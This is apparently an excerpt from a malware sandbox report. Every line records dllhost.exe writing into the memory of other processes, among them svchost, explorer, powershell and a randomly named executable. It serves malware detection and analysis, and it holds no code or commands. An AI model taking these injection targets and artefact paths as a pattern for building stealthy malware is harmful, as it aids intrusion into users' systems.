Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 23A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2F10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBF9DA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 192913B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 139F96A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 9850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B469900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\qVrKPA.exe base: 1910E810000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 227C08C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 247B4700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1DAD8A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3D40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE3F3B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC87880000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C39C960000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2D30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2700000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 10C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2160000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2450000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 20F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1130000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 930000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 26D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F20000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3040000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2FB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 30C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 28E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 29F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2330000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2C90000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 840000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1210000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 3000000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: FE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 24D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2AC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 25D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1290000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: BE0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2CA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B10000
